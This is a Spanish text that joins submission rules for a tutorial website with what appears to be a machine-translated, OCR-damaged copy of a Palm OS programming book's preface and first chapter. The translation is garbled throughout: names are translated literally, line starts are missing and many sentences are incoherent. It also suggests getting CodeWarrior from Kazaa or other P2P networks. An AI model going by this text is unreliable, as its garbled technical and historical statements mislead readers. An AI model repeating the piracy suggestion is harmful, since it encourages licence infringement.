Si se trata de documentos html deberás enumerar las imágenes por el nombre del archivo PUEDEN 
ESTAR ZIPEADOS CON ZIP , RAR TODOS LOS ARCHIVOS grandes deberán de ser comprimidos 
con (DE PREFERENCIA, NO OBLIGATORIO LA COMPRESION) WINRAR en varios discos de 
720 KB la compresion en Winrar recuerda que se hará ( en formato RAR , modo de compresión el 
mejor , Tamaño de volumen bytes se hará de 737,280 bytes para que te resulten 720 Kb por disco, ya 
este servidor no acepta archivos mayores a este tamaño) 


2A .- Todas las imágenes deberán de ser numeradas si es que usas el formato HTML 


Por ejemplo si el programa se llama Realplayer for palm.pre deberás de nombrar las imágenes (Solo 
se aceptarán Gif, Jpeg ó Jpg) como Realplayer_for_palm1.jpg, Realplayer_for_palm2.jpg, 
Realplayer_for_palm3.jpg, Realplayer_for_palm4.jpg, ....... Ya que tardo muchos horas subiendo las 
imágenes y cambiándoles de nombre por que muchos colegas envían archivos como imagen], imagen2.. 
etc, Una vez echo esto deberás de comprimir tus archivos en un solo archivo comprimido ya sea Winrar 
ó Winzip, Al enviar el archivo no pongas espacios y todo en minúsculas ejemplo: realpler_for_palm. 
zip ya que todavía algunos servidores no aceptan espacios y es como reconocen como un archivo 
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ARCHIVO HTM Archivo ZIP  : Invierte tiempo creando buenos totorales, Los tutorales deberán 
tener buena ortografía de preferencia. Las personas que envíen Virus serán bloqueadas del E-mail y sera 
bloqueada su dirección de IP del servidor no podrán accesar más a esta página web ,Una vez echo esto 
ya puedes enviar un E-mail a 


3.- No se aceptarán trabajos que únicamente indiquen la instrucción de como cambiar un BEQ 
por un BNE .... etc 
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(ARCHIVO HTM Archivo ZIP) (ES OPCIONAL, de lo contrario nosotros nos encargamos a 


pasarlo a 
HTML) y esperar a que tu manual se analizado 
y probado por nuestro equipo de colaboradores. 
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Prefacio 


1992, Palm (ahora PalmOne, S.A.) estaba fundado. Lo demas es historia. Por supuesto, hay 
bastante más para eso. Muchas buenas decisiones estaban hechas, y muchos malos diseños 
ueron tirados a la basura. La palm arrancó como una compañía informática intentando 
influenciar a fabricantes de mano existentes con su tecnologías del software de fácil uso y de 
sincronización. La compañía pronto se dio cuenta de dos cosas. La primera parte fue que los 
abricantes del hardware no les parecieron creer en la filosofía de Palm. El segundo fue que 
ue difícil hacer una escritura justa comercial viable informática para este mercado de la parte 
pequeña. palm se dio cuenta de que su primera toma en esta compañía no fue la correcta y 
se decidió a convertirse en el amo de su destino. El nombre fue palm Pilot. La palma cambió 
el foco de su negocio virtualmente correo expreso. Esto es bastante análogo en el desarrollo, 
donde usted se encuentra con que la primera toma es raramente la mejor. A menudo he 

uelto a través de mi código y he descubierto algunos diseños locos. Sólo entonces hágame 
que descubro el mejor diseño arquitectónico, dándome menos problemas nos resueltos en el 
software y el mejor set de rasgo. En Palm, esto es conocido como el lugar dulce y eso es una 
Zona que en pocos desarrolladores entran y menos permiso de ausencia exitosamente. 


Sin embargo, Palm no sólo entró en esta zona, eso ahora la posee. Esto da cuenta de la 
mayor parte del éxito de Palm. Hay más dispositivos poderosos allí afuera (PocketPC), y hay 
más conectados (Cybiko). Pero todos esos dispositivos combinados todavía no ascienden a la 
cantidad de dispositivos que la Palma tiene, se embarcó. ¿Por qué? Porque Palm ha 
encontrado el lugar dulce, el lugar donde la funcionabilidad y la facilidad de uso estén en 
conflicto, y que las decisiones difíciles son hechas a remueve funcionabilidad (algo que aun 
Microsoft tiene, no se percató). Otras compañías han descubierto esta zona y entienden lo 
que es menester en el mercado de mano. Esa es la razón por la por que estas compañías 
muy sabias han licenciado al Palm OS. A las compañías les gusta a Sony, Handspring, y 
Symbol todo se hayan dado cuenta de la importancia de filosofía de Palm, donde la facilidad 
de uso y el poder no son necesariamente mutuamente exclusivos, y dónde el usuario final que 
la experiencia es siempre coronan muesca. 


| momento de escribir la presente, hay más que 100,000 desarrolladores Palm OS. Esta 
comunidad de desarrollo es tan diversa como el mundo de computación: De escuela 
secundaria bromea escribiendo en Basic para los investigadores universitarios expertos 


escribiendo en C, de desarrolladores de la empresa escribiendo en Java para los 
desarrolladores comerciales escribiendo en C. De Iceland para Argentina, estos 
desarrolladores se han no sólo dado cuenta de que Palm es el de venta masiva de mano en el 
mundo pero también ese el Palm OS sea un sistema operativo despejado, intuitivo para 
programar y muy claramente documentado. No planeo ver que los desarrolladores 
evangelizan las virtudes de Biblia Palm OS O Programming, pero lo deberían hacer. Lonnon 
Foster ha comprobado que él entiende no sólo los tundamentals de x de programación Palm 
OS Foreword pero el lugar dulce de escritura igualmente. Este libro cubre todo de construir 
ormas y menús para programar sonidos y el color. Los ejemplos son completos pero 
asombrosamente simples. No sólo la voluntad que usted aprende a programar el Palm OS, 
usted entenderá la filosofía que ha hecho Palm exitosa, y al hacer eso, espero que usted 
endrá éxito también. 


Phillip B. El zapatero Director, Development Equipa con herramientas a Palm, S.A. 


Programacion para Palm (Algunas alternativas que probe pero 
ninguna le llego a los talones de CodeWarrior For Palm Os) 


hotpaw basic Permite programar y ejecutar programas en BASIC, desde la propia palm; 
precisa mathlib 


- mps_palm Para programar 

- OnboardC Para programar en C para Palm 

- VCOPpCv0.8 Este programa posee características de programación de PocketC 
orientada a objetos. Requiere la herramienta PocketC Runtime 

- Code warrior. Para programar aplicaciones para palm 
(uno de los mejores) 

- palmOS Web application devepoppers guide. ebook 

- piIRC 

- pocketC 

- PalmOS Pascal Compiler 

- Pocket Studio es un entorno de programación basado en el entorno de 
Delphi y el lenguaje de programación Object Pascal de Borland 

- sres40 Rutinas para programación en c 

- Tauschke MobileCreator 1.3 es un sistema de programación en SuperWaba 

- Appforge Crossfire Para convertir aplicaciones en Visual Basic a Palm 
(Requiere runtime de 700 KB), No lo recomiendo si tiene una Palm de 2 MB ólvidese de 

este 

- pdatoolbox (muy sencillo pero limita la mayoria de las aplicaciones) 

- HB++ http://www.handheld-basic.com ( Crea aplicaciones similar a visual Basic 

La gran diferencia es que no requiere runtime como Appforge, 


(Este último a precio de $500.00) Caro pero bueno , este se acerca a 

Codewarrior en Estabilidad y funciones, tambien existe una versión Shareware 
Demo, Si no tiene el archivo de Registro solo tendra una molesta Nag al cargar 

Su aplicación, Si se ha convensido por este último, es recomendable que salga de 
este tutorial y estudie visual Basic. (Esta al tu por tu con CodeWarrior For Palm Os). 


otengo uno que se llama Palmphi, es para programar en C, y es GRATIS!, es para windows. 
El palmphi podes esncontrarlo en esta direccion, hay screenshots en la misma. 

http://www .digital-kingdoms.net/palmphi/ 

El palmphi es para windows, y el lenguaje que se usa es C, el pocketC realmente no es un C, 
es parecido, pero parece mas un script 


Este libro se vasara en su totalidad en CodeWArrior For Palm y GNU PRC Tools 
útilizando como lenguaje de programación el tipico lenguaje C++/C Orientado a objetos 
I cual crea aplicaciones de tamaño pequeño y con recursos optimos de sistema, A 
diferencias de otras alternativas que ocupan mucho espacio en el archivos quizas hasta 
I triple como lo pude comprobar con Pdatoolbox 7 y altamente inestable pues tube que 
resetear mi Palm varias veces con este último. Ademas que C++ es Standard Ansi y 
podremos útilizarlo en cualquier plataforma ya sea compilarlo en Linux , Windows, 

Mac , Solaris , Unix ,etc. 


Recomiendo ampliamente que antes de pasar al capitulo Uno se consigan Codewarrior For 
Palm ó GNU PRC Tools ya sea comprandolos ó bajandolos del Kazaa ó alguna red de 
intercambio de archivos P2P , O Con su proveedor de programa más cercano, tambien puede 
dercargar una versión demo de codewarrior directamente desde la página de www. 


metrowerks.com ó comprar una licencia de Us$500.00 


Prologo 


La conveniencia de poder y la facilidad de uso de de dispositivos de mano marca Palm OS 
es atractivo para una variedad ancha de usuarios. Los dispositivos de mano Palma OS se 
pueden transportar en los bolsillos de la camisa de empleados de: doctores, abogados, 
endedores, profesionales, comerciantes, y otros segmentos de sociedad Palma OS también 
ha probado a ser popular por los programadores a la publicación de este libro. 


La Biblia de la palma OS 6 Programming le enseñará qué tan fácil es crear aplicaciones para 
la línea popular de Palm's organizadores de mano, así como también los dispositivos de 
erceros que también ponen a funcionar el Palm OS. Además, esta creación de forros de libro 
de Web recortando hojas de solicitud para que el Palm VII/VIlx (y otro Palm acondicionado 
inalámbrico OS handhelds) dé conexión inalámbrica permiso de la Internet. Usted también 


encontrará material en escribir programas del conducto para sincronizar datos entre un Palm 
OS de mano y un computador de escritorio. 


Si usted es un desarrollador para una organización grande que integra Palm OS handhelds en 
su fuerza de ventas o un hobbyist que quiere obtener la mayoría de su organizador, usted 
encontrará este libro como una guía útil para crear software para la plataforma Palm OS. 


El foco primario de este libro es desarrollo Palm OS en el lenguaje C, usando el software 
CodeWarrior for Palm Os ó usando GNU el PRC-TOOLS del GNU como un ambiente de 
desarrollo libre. Otras herramientas existen para desarrollar aplicaciones Palm OS (y una 
isión general de otro tales herramientas está disponible en las apéndices), pero estos dos 
ambientes son populares con la audiencia más grande del desarrollador, y ofrecen el acceso 
más completo para las muchas características del Palm OS y los handhelds que lo ponen a 
uncionar. 


Debería leer a Este Book Este libro fue escrito con el programador experimentado de la C en 
mente. Si usted no sabe nada de programación en Palm OS, entonces este libro le iniciará 
con los conceptos fundamentales, enseñándole cómo trabajar Palm OS, mostrándole las 
herramientas disponibles para el desarrollo para Palm OS, y proveyéndole a hacer su propias 
aplicaciones como una sola pieza dentro de las líneas directivas programadas de Palm. 


un si usted ya ha explorado en el mundo de crear aplicaciones Palm OS, usted encontrará 
este libro un recurso útil, porque cubre casi cada aspecto de desarrollo Palm OS a fondo. El 
Palm OS es muy grande, y este libro puede servir de un guía para explorar esas partes del 
sistema operativo del que usted todavía no se ha ocupado. 


El XIl Prefacio Si usted tiene el deseo de crear Web recortando hojas de solicitud para el 
Palm VII/VIIx, usted necesitará saber que los fundamentos de HTML y la Web mandan a 
llamar creación para hacer el Palm Query Applications (PQASs) eso residir adelante de mano y 
proveer una conexión lateral en cliente para la Internet. Para crear el servidor lateral de una 
Web recortando hoja de solicitud, usted necesitará estar familiarizado con algún tipo de 
sistema para crear contenido dinámico de la Web, como Perl CGl o Server Activo Pages. 


El programar conductos requiere conocimiento de C ++, así como también un conocimiento 
básico de cómo crea las aplicaciones de mesa para ya sea Windows o la Macintosh OS. 


Este Libro Es Organizado que en siete partes, y cuatro apéndices. 


Parte |: Esta primera parte del libro discute la filosofía detrás del Palm OS e introduce 
conceptos fundamentales detrás del rodaje del sistema operativo. 


Parte Il: Creando Applications Palm OS, Los capítulos Partarte Il indica los diseños de una 


aplicación Palm OS. Esta sección comienza con una excursión de las herramientas 
programando en Palm OS , Empieza con un " Hello " simplista ", " aplicación " Mundial " y 
inalmente herramientas de presentes y técnicas para la parte favorita de cada programador 


de escritura una aplicación: 
Depurando. 


Parte lll: Programando Palm OS La tercera parte de este libro enfoca adelante realmente 
escribiendo el código para hacer operar una aplicación Palm OS. Echando a andar con 
capítulos crear los recursos que forman la estructura de una aplicación, este papel continúa 
enseñando qué tan realmente hacer el programa hacer algo, de interactuando al usuario par 
el texto manipulador. 


Parte IV: Almacenando Información en el Handheld Part a la que IV enseña como almacenar 
recuperar datos de aplicación. Comienza con el cuadro grande, salir a la vista , interactuar 
con bases de datos, para una apariencia más cercana de registros que forman una base de 
datos. 


Parte V: del xiii Prefacio : Comunicación por infrarrojo del Handheld Los capítulos cubren de 
la V Parte indica los métodos innumerables un Palm con los que pueden comunicarse con el 
mundo exterior, incluyendo infrarrojos, serial, e inalámbrico de la Web. 


Parte VI: Sincronizar Datos con el Desktop Part VI introduce los conceptos HotSync 
Manager, lo cual permite a un Palm OS de mano sincronizar sus aplicaciones con fuentes de 
datos de mesa. La sección continúa enseña a escribir interacción entre una PDB base de 
datos Palm OS y las aplicaciones de mesa. 


Parte VII: Programming Topics In Part adelantado VI! usted encontrará temas diversos que no 
surja siempre que haga a los demás en Palm OS programando, incluyendo manejando color, 
creando aplicaciones grandes, y creando elementos de la interfaz del usuario dinámicamente 
mientras una aplicación corre. 


Las apéndices que La sección final del libro es santificada para cuatro apéndices: 
. Apéndice A, " Palm OS API Quick Reference, " es un guía rápido para el más las 
estructuras de funciones comunes, de datos, y constants usados en el Palm OS, incluiyendo 


prototipos para el funcionamiento de Palm OS. 


. Apéndice B, " Encontrara códigos para dispositivos Palm OS, una lista de recursos útiles 
para desarrolladores Palm OS. 


. Apéndice C, " Herramientas diferentes, es un escrutinio de herramientas alternativas para el 


desarrollo Palm OS. 


. Apéndice D, " Qué en el CD-ROM?" Describe los contenidos del CD-ROM que acompaña 
este libro, lo cual presenta código de muestra y aplicaciones del libro, así como también todas 
las herramientas que un desarrollador necesita quedar iniciado con desarrollo Palm OS. 


demás, he incluido un glosario al final del libro. 


Prefacio XIV simbologias: cómo leer este libro, que es completamente nuevo para el 
desarrollo Palm OS obtendrán que la mayoría aprovecha este libro leyendo las Partes primera 
parte ll para obtener una buena introducción de cómo usar los trabajos Palm OS y cómo 
CodeWarrior o el PRC-TOOLS. Despues mire la Part Ill para aprender qué a hacer con esas 
herramientas para hacer una aplicación real, y seguir con la Part IV para aprender a salvar y 
recuperar datos de una aplicación. Las otras partes del libro pueden ser leídas en cualquier 
orden; Escoja un tema de interés, y el principio leyendo. 


Pues los lectores que ya han hecho algún desarrollo Palm OS, Parten probablemente desde 
el material que usted ya sabe. La parte ll puede ser útil si usted usa ya sea CodeWarrior o el 
PRC-TOOLS, y usted quieren ver cómo los otros trabajos del juego de herramientas 
comparado con lo que usa usted, y en particular, Chapter 5, " Depurando Su Programa, " 
contienen ejemplos útiles para cualquier desarrollador Palm OS. Parte lll e IV servirán de 
referencias útiles para partes del sistema operativo con el que usted puede o ya no puede 
estar familiarizado, y los posteriores capítulos introducen otros papeles del Palm OS que no 
son estrictamente requeridos por la mayoría de aplicaciones. 


Los desarrolladores de aplicaciones pueden ir directamente a Chapter 16, " creando 
aplicaciones web." La mayoría recortando requiere sólo un conocimiento básico de HTML, y si 
usted topa con cualquier confusión de palm OS ó conceptos que usted no está familiarizado, 
alla a la Parte ll para resuelver cualquier confusión. 


Cualquier interés tendrá primero estar familiarizados con la información conceptual en parte 
suya. Después de que usted entienda los conceptos de Palm OS, vuélvase hacia Parte VI 
para aprender qué tan informado esta sobre su computadora Palm OS. 


Este capítulo comienza con unos temas cubiertos en el capítulo y los fines con un resumen de 
lo que debería haber aprendido usted leyendo el capítulo. 


todo lo largo de este libro, usted encontrará iconos en los márgenes que resaltan 
información especial o importante. Esté alerta para los siguientes iconos: 


Un icono Caution indica un procedimiento que potencialmente podría causar dificultad o aun 
pérdida de datos; Pongo mucho ojo para iconos Caution para evitar trampas poco comúnes y. 


Los iconos de referencia cruzada apuntan para la información adicional acerca de un tema, 
cuál usted puede encontrar en otras secciones del libro. 


Busque en otras secciones de este libro 


Un icono resalta información interesante o suplementaria y a menudo contiene añidos 
adicionales de información técnica acerca de un tema. 

El icono foco indica buscar en el CD-ROM para la información, Idisponible en el CD-ROM que 
acompaña este libro. 

Los iconos de propina llaman la atención para las sugerencias convenientes, los indicios 
útiles, y los consejos útiles. 

demás de los iconos listados previamente, las siguientes buenas costumbres tipográficos 
son usadas a todo lo largo del libro: 

. Los ejemplos de código aparecen en un carácter de imprenta fijo de anchura. 

. Otros elementos de código, como las estructuras de datos y los nombres variables, aparecen 
en la anchura fija. 

. El archivo en el que los nombres y las direcciones de la Red Mundial de Comunicación 
(URLs) también aparecen centró anchura. 

. La función y los nombres de macro están en negrita. 

. La primera ocurrencia de un término importante en un capítulo es resaltada con texto itálico. 
La letra itálica sirve también para placeholders — por ejemplo, el nombre de archivo del < 
icono del ICONO >, donde el nombre de archivo del < icono > representa el nombre de un 
archivo del bitmap. 

. Una orden del menú es indicado en la orden jerárquica, con cada orden del menú separado 
por una flecha. Por ejemplo, File.Open tiene la intención de dar un clic sobre el comando File 
en la barra de menús, y entonces seleccionar a Open. 

. Los atajos del teclado están indicados con la siguiente sintaxis: Ctrl + C. 

¿La propina On el CD-ROM Qué Es un Sidebar? 

Los temas en recuadros complementarios proveen información adicional. El texto del recuadro 
complementario contiene debate que está relacionado al texto principal de un capítulo, pero 
no vital para entender el texto principal. 
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En Este Capítulo 


Entenderá cómo y por que la plataforma de palm es diseñanda para crear aplicaciones y 
ejecutarlas Para dispositivos PALM ¡comparación con la computadora de escritorio , 
Compararemos el hardware y las versiones futuras de Palm OS. 


Palm plataforma computacional 


Desde la liberación del Pilot 1000 en 1996, la corrida de dispositivos Palm OS ha dominado el 
mercado de computación de mano. Desde un principio, la Computadora Palm pudo combinar 
justamente la mezcla correcta de características para hacer a un Assistante Digital Personal 
(PDA) que es fácil para integrarse en casi todo el estilo de vida de cualquier usuario. 
Programar una aplicación que se aprovecha de las fuerzas de la plataforma Palm requiere 
una comprensión de no sólo cómo la plataforma opera, pero también porque fue diseñada la 
orma de esta. 

Este capítulo explica una parte la manera enque ha hecho la Palm para tener tanto exitoso. 
ambién provee una visión general de las versiones diferentes de Palm OS disponible y las 
plataformas del hardware en las cuales corren. La Palm funcionar con el sistema Palm OS y 


no se ha pretendido para versiones portátiles de computadores de escritorio Laptops. En lugar 
de eso, el de mano es un dispositivo del satélite, diseñado como una extensión para un 
sistema de mesa. Palm provee una ventana para los datos del computador de escritorio, 
permitiendo que los datos sean llevados a donde quiera. Aunque se logra ciertamente realizar 
muchas tareas complicadas con Palm OS handhelds, su forma y función optimizan sus datos 
pero tiene capacidad para pocos datos. 


Parte |. Comenzando 


Dentro de las posobilidades que presenta al usuario con respecto a la computadora de 
escritorio, el dispositivo de mano debe apegarse a ciertos criterios: 


. tamaño pequeño. Necesita ser bastante pequeño para ser llevado dondequiera. La mayor 
parte de los dispositivos actualmente disponibles para el Palm fácilmente se pueden llevar en 
un bolsillo de la camisa. El Palm V, el miembro menor de la familia Palm, mide 4.5 x 3.1 x 0.4 
pulgadas, pesa unas 4 insignificantes onzas. lo más grandees pdQ de Qualcomm, medidas 
sólo 1.4 x 6.2 x 2.6 pulgadas, con un peso de 8.2 onzas, e incluye un teléfono celular 
pequeño. 


. La interfaz ergonómica. Usar el dispositivo no debe ser lo suficiente simple y rápido para 
que no interrumpa lo que el usuario actualmente hace. Los usuarios Palm necesitan que sea 
comoda y rápida al manejar el dispositivo durante reuniones, en aeropuertos, en almuerzos de 
negocio, y en otras situaciones donde no hay el lugar conveniente para conectar sobre el 
suelo el dispositivo. La información interesante debería estar disponible instantáneamente y 
con un mínimo de interacción del usuario. Las cuatro aplicaciones principales que se 
embarcan con Palm OS handhelds (la Fecha Book, Libro de direcciones, Para Do List, y la 

genda) pueden ostentar información interesante sin cualquier entrada del usuario; El usuario 
puede accesar a través datos de las aplicaciones usando los botones del hardware. 


. Integración la desktop. La Palm debe funcionar sincrónicamente fácilmente y de fuente 
idedigna con el computador de escritorio. Ocurrir simultáneamente con el computador de 
escritorio no sólo respalda datos importantes, pero también da al usuario permiso de introducir 
en la computadora cantidades grandes de datos en una máquina de escritorio con un ratón y 
el teclado, lo cual es mucho apostador adecuado para la entrada de datos masiva en la 
interfaz limitada de la palm. Las palma OS handhelds incluyen una base sync para accesar 
con la computadora de escritorio con solamente prensionar un botón, y la computadora de 
mano Palm con tecnología HotSync rápidamente transfiere datos entre la agenda de mano y 
la computadora de escritorio. 


Palm ha tenido exito por la combinación perfecta de estos factores con su primer dispositivo, y 
han resistido la tentación con su scroll en dispositivos nuevos Palm. Aunque tienen menos 


rasgos que muchos otros handhelds, como Windows CE y los dispositivos mayores Newton, 
Palm OS handhelds está más enfocado en proveer características que serán genuinamente 
útiles. La selección inteligente de características ha convertido estos dispositivos en 
herramientas convenientes en lugar de juguetes meramente caros. 


Comparación de una Desktop y Diseños de Aplicaciones en 
Portatiles 


Son diferencias significantes entre un computador de escritorio y un dispositivo de mano , 
bastantes diferencias en diseño contra una aplicación de escritorio. Varios elementos deben 
ser recordados al diseñar una aplicación Palm OS: 


a expectativa de desempeño 

os métodos limitados de entrada 

l tamaño de la pequeña pantalla. 

a batería y el poder del procesador. 

a memoria limitada. 

a RAM como el almacenamiento permanente de datos 


Expectativa de funcionamiento 


a velocidad y la eficiencia son cruciales para una aplicación exitosa Palm OS. Escribir código rapido 
n una parte pequeña de una ecuación; La interfaz del usuario debe estar sencilla y rápida para usar. La 
aplicación debería tener en cuenta navegación rápida, selección, y ejecución de órdenes. Las funciones 
ue el usuario usará más a menudo deberían requerir menos interacción que esos que será usada 
infrecuentemente. 


Limites de métodos de entrada 


Los usos de una aplicación usualmente no pondrán esperar algunos segundos un programa a 
cargar porque tienen intención de usar la aplicación para un período de tiempo extendido. Un 
Usuario sentado en un escritorio probablemente no va dondequiera cuando quiera pronto. 
seméjese esto con un usuario de mano en actividad. Una persona usando una Palm OS de 
mano necesitará mirar hacia arriba por unidad de datos (como un número de teléfono) 
rápidamente, o gastar algunos segundos incluyendo en la lista una nota, mientras realizan 
otra tarea. 

Iguien que dirige la palabra a los clientes por teléfono o tratando de coger un autobús el no 
¡iene el tiempo para vigilar una aplicación y esperar mientras una aplicación se carga. Un 
sistema de escritorio es ideal para entrar cantidades grandes de datos. Un teclado y un 
procesador rápido dan a usuarios de mesa permiso fácilmente introducir en la computadora 


montones de texto en la computadora en un corto tiempo. Un Palm OS de mano no tiene un 
eclado. Sin embargo los teclados accesorios de terceros existen, como el Newton, GoType !, 
y teclados Palm Portable, la mayoría de usuarios de un estándar Palm OS de mano deben 
entrar en texto con un estilo ya sea Graffiti o un teclado en pantalla. Graffiti, un sistema 
informático que convierte un tipo especial de taquigrafía en texto, es más rápido y más exacto 
que intentos previos al escribir a mano y sea reconocido, notablemente eso es usado por el 
pple Newton. En lugar de usar el poder limitado del procesador y la memoria disponible en 
un dispositivo de mano al hacer sentido de su escritura, Graffiti confía en un sistema mucho 
más poderoso para realizar su magia: El cerebro humano. Es mucho más simple para una 
para persona aprender a escribir con el set simple de Graffiti de caracteres que el que está 
para por unidad de software para interpretar las idiosincrasias de la escritura de la mayoría de 
la gente. (Un amigo mío uso para poseer a un Newton, y después de gastar los meses 
afinándolos para reconocer su escritura, él en forma negativa no dejó que cualquier otro 
acérquese a su dispositivo por el miedo para que ellos no supieran usr el software de 
reconocimiento.) Aunque Graffiti es más rápido que muchas formas de reconocimiento de 
escritura, en una velocidad máxima de alrededor de treinta palabras por minuto, es todavía 
demasiado lento para entrar cualquier cosa más larga que una nota pequeña. 

La tecnología HotSync provee una forma fácil para obtener cantidades grandes de datos del 
sistema de mesa hacia su Palm. La plataforma palm esta diseñada con la idea que los 
usuarios realizarán entrada de datos masiva en la máquina de escritorio, lo cual resulta 
posible para este tipo de trabajo, y entonces un * sync ” que envia datos a palm. Este tipo de 
simbiosis entre computador de escritorio y los juegetes de mano unen fuerzas ambos 
dispositivos. 

Sin embargo, no deje que esto lo desaliete para escribir aplicaciones que usan un Palm OS de 
mano como una herramienta de la colección de datos. Con diseño inteligente de la interfaz, 
usted puede realizar entrada de datos rápidamente y eficazmente en tal dispositivo. 

Para más detalles acerca de datos de entrada, vea el Chapter 2, 


“ Entendiendo la Palm OS.” 


Las máquinas Actuales Size Screen pequeñas de computador de escritorio tienen monitores 
grandes, generalmente corriendo en una resolución mínima de 640 x 480 pixels. Con este tipo 
de pantallas Palm cantidades pequeñas de resolución. 

En cambio, Palm OS handhelds tiene una pantalla 6 centímetros en un lado, con una 
resolución de 160 x 160 pixels. Este tamaño de la pantalla hay que conservar el dispositivo 
dentro del rango de tamaño del bolsillo de camisa que ha contribuido a la popularidad de tales 
dispositivos.Actualmente ya existen PDAS Palm que ya tienen resoluciones de 320X320 a 
color soportando más de 10,000 colores.como por ejemplo la zire 72 salida a la fecha de 
publicación de este escrito. 

Diseñar aplicaciones para usar tan una pequeña pantalla es un desafío. Ostentar la 
información correcta es más importante que acomodando tanta información en la pantalla tan 
posible. Usted debe encontrar el término medio entre mostrar bastante información y obligar la 
interfaz libre de estorbos y simple a cumplir uso. 


Requerido que usuarios usan a través de muchas pantallas de datos para encontrar la 
información que quieren hará su aplicación frustrante del uso. Encuentre agrupamientos 
lógicos de datos y ofrézcale al usuario una forma para filtrar vistas diferentes de los datos. La 
aplicación To Do List es un buen ejemplo de filtrado de datos; Sus preferencias permiten al 
usuario rápidamente escoger qué subconjunto de la lista debería ser ostentado. 
Implementando al Palm estándar OS las categorías definidas por usuario también pueden 
ayudar a entrar cero de usuarios en exactamente los datos que quieren mirar. 


Bateria y poder de procesamiento 


Son Diferentes a los procesadorres de las desktop ,Son casuales procesadores y poderosos, 
rápidos los de las Palm OS handhelds ¡debe confiar en baterías de poder, lo cual las limita 
para procesadores más lentos. El procesador pequeño en tal dispositivo no es 
adecuadamente adecuado para la computación intensa. 

Si su aplicación tiene ambos componentes de mano y de mesa, entonces considere hacer 
odo su número intensivo masticando ruidosamente en la porción de mesa. Un gran ejemplo 
de referencia cruzada 


Relegar tareas intensivas en procesador para la máquina de mesa es Doc, el estándar 
efectivo para documentos grandes del texto en el Palm OS. Varias aplicaciones del 
convertidor existen para la máquina de mesa, cuál realiza el computationally conversión cara y 
la compresión de un documento grande del texto para formato Doc. El documento recién 
ormateado entonces puede ser cedido el de mano durante la siguiente sesión HotSync. Toda 
la aplicación del espectador Doc en la preocupación de necesidad de mano misma con es 
exhibir el documento; Todas las cosas duras han sido manipuladas por el computador de 
escritorio más rápido. 


Memoria limitada 

Como los precios de memoria continúen descendiendo, aplicaciones de mesa pueden ofrecer 

ser menos muy selectivas al ocuparse de memoria. Con lo que su aplicación tiene 64MB o 

más , puede cargar construcciones enormes de datos en RAM y las puede dejar allí el tiempo 

entero que el programa marcha. 

La palm OS handhelds tiene espacio de memoria muy limitado al correr aplicaciones. 

delante Esconda en la palm OS 3 y más tarde, hay menos de 36KB de memoria disponible 

para la afijación dinámica, aplicación variables globales, y variables estáticas. Las anteriores 
ersiones de Palm OS tienen considerablemente menos cuarto, así escribiendo aplicaciones 

que son compatibles con mayor Palm OS handhelds pueden ser algo desafiantes. Recuerde 

esto al escribir su aplicación; A las cosas les gustan profundamente las rutinas recursivas, los 

números grandes de variables globales, y enorme las estructuras de datos dinámicamente 

ubicadas que no sean amigables para su Palm OS 


La RAM es permanentemente usada 


Las computadoras de escritorio almacenan permanente abundantes cantidades de datos en 
Ram. La palm OS handhelds está considerablemente más limitada en espacio de 
almacenamiento porque deben almacenar aplicaciones y datos en RAM. La memoria 
disponible en un Palm OS oscila entre 128KB para Pilot 1000 y 8MB en el lllxe Palm o Visor 
Deluxe, Palm Zire 72 con 16MB, Algunas versiones de PalmOne Tungsten soportan hasta 
256MB sin usar targeta de expansión (Incluidas en el slot principal) y no usando la ranura de 
expansión. Este tipo de almacenamiento limitado hace que las aplicaciones de mano deban 
ser lo mas pequeñas posibles. Evite añadir características para su aplicación que será usada 
infrecuentemente; Si un rasgo será usado por ahí menos que 20 por ciento de los usuarios, 
omítalo. 

Por ejemplo, las características que globalmente modifican los datos de una aplicación, 
solamente verán sólo uso infrecuente, incluya solo lo basico en un programa . Una orden que 
remueve entradas duplicadas en una base de datos sería perfecta para el computador de 
escritorio; Es ni por ensueños para ser usada misma a menudo adelante Por la Palm, y 
remover caracteristicas casi nunca usables de la aplicación de mano haran sus programas 
mas pequeños. 

Su aplicación también debería asestar sus datos apretadamente antes de escribir eso para la 
memoria. No sólo la voluntad esto reduce la cantidad de RAM requerida para almacenar los 
datos de su aplicación, pero también disminuirá la cantidad de tiempo con el HotSync al 
sincronizar los datos con el computador de escritorio. 


Conectando con su Desktop (Compartiendo datos con la Pc de 
escritorio) 


con el computador de escritorio es un ingrediente crucial en la popularidad de Palm OS 
handhelds. 

La conexión entre computador de escritorio y de mano deja a cada dispositivo pedir prestado 
las fuerzas del otro. Un computador de escritorio es genial para la entrada de datos de gran 
escala y triturando números, pero usted no puede llevar uno en su bolsillo al visitar a clientes. 
Un dispositivo de mano es perfecto para notas rápidas atractivas y recordando usted acerca 
de citas, pero es terrible para analizar informaciones financieras o escribir un libro. 
Conjuntamente, los dispositivos se ponen mayores que la suma de sus partes. 

El componente informático que forma el eslabón vital entre el dispositivo Palm OS y el 
computador de escritorio está llamado un conducto. HotSync llama código en un conducto, lo 
cual reside en el computador de escritorio, durante la sincronización con su aplicación de 
mano, y este código controla exactamente los datos con el HotSync y traslada e intercambia 
el contenido entre los dos dispositivos. Hay varios escenarios diferentes en los cuales un 
conducto juega ya un papel vital; 

quí hay justamente algunos ejemplos: 


. Dos aplicaciones, uno en la handheld y otro en la computadora de escritorio, se comunican y 
guardan registros del historial de ambos en sus bases de datos por medio de la sincronización 
de cada otro. Esto es cómo opera el conducto para el Date Book y las tres otras aplicaciones 
principales Palm OS. En este escenario, el conducto es responsable de mirar los registros en 
ambas bases de datos y determinar qué registros son diferentes entre ellos, así como también 
cuál dirección de datos deben ser transferidos. 


. El conducto guarda datos en que una aplicación de mano que sincronizó con datos en una 
base de datos coorporativa centralizada, ya sea almacenando al corrirer el dispositivo 
HotSync, u otra máquina en una red corporativa. En este caso, el conducto también podría 
amizar los datos y transferir sólo un subconjunto hecho a la medida basado en las 
preferencias del usuario. La adecuación como esto conserva el tamaño de los datos dóciles y 
se reduce el tiempo requerido para que HotSync funcione. 


. Cuando el syncing, compare contenido de la Palm con los contenidos de una Web página o 
Usenet newsgroup. Si la información en la Web o newsgroup es más nueva que lo que ha 
almacenado la aplicación de mano, el conducto hace un download de los datos nuevos, le 
ransmita en forma que la aplicación de mano pueda leer, entonces las transferencias en la 
PDA. El conducto también puede instruir la aplicación de mano para entresacar páginas 
anticuadas o artículos. Desde que la Internet hizo que las conexiones fueran rapidas 
probablemente sólo debería mirar información previamente escondida en reserva por una 
aplicación de mesa. Una operación HotSync debería ser tan abruptamente tan posible corta 
para tener el puerto serial abierto . 


Si su aplicación no requiere el nivel de lógica detallada de sincronización un conducto puede 
